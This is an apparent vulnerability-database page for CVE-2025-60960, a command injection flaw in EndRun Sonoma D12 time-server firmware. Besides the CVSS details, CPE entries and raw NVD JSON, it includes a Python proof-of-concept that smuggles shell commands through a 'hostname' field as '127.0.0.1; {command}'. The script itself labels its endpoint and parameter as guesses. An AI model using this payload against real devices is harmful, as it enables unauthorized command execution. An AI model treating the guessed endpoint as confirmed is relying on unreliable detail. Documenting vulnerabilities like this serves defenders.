Security Vulnerability Report
中文
CVE-2025-60960 CVSS 8.2 HIGH

CVE-2025-60960

Published: 2025-10-06 17:16:07
Last Modified: 2025-10-10 16:35:54

Description

OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to execute arbitrary code, cause a denial of service, gain escalated privileges, and gain sensitive information.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:* - NOT VULNERABLE
EndRun Sonoma D12 NTP Server F/W 6010-0071-000 Ver 4.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60960 - EndRun Sonoma D12 OS Command Injection PoC # Vulnerability: OS Command Injection in Web Management Interface # Affected: EndRun Sonoma D12 NTP Server F/W 6010-0071-000 Ver 4.00 # Researcher: xdiv-sec import requests import sys TARGET = "http://<target-ip>" # The vulnerable endpoint accepts user input that is passed to a system shell # without proper sanitization, allowing OS command injection. def exploit(command): """ Inject OS commands through the vulnerable parameter. The vulnerable parameter is typically found in network configuration or diagnostic pages of the Sonoma D12 web interface. """ # Example injection via command separator payload = f"127.0.0.1; {command}" # Adjust the endpoint and parameter based on the specific vulnerable interface url = f"{TARGET}/cgi-bin/ntp.cgi" params = { "hostname": payload, # Example vulnerable parameter } try: response = requests.get(url, params=params, timeout=10) print(f"[+] Status: {response.status_code}") print(f"[+] Response:\n{response.text}") except Exception as e: print(f"[-] Error: {e}") def verify(): """Verify the vulnerability by injecting a benign command (e.g., id or uname -a).""" print("[*] Testing for CVE-2025-60960 - Sonoma D12 Command Injection") exploit("id") if __name__ == "__main__": if len(sys.argv) > 1: TARGET = sys.argv[1] verify()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60960", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:06.843", "lastModified": "2025-10-10T16:35:53.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to execute arbitrary code, cause a denial of service, gain escalated privileges, and gain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:*", "matchCriteriaId": "6F239BEA-C83D-46D5-A558-478D6F01A27A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:*", "matchCriteriaId": "2D229C97-27FA-4DC6-9EB9-7757C6638143"}]}]}], "references": [{"url": "http://endrun.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://sonoma.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}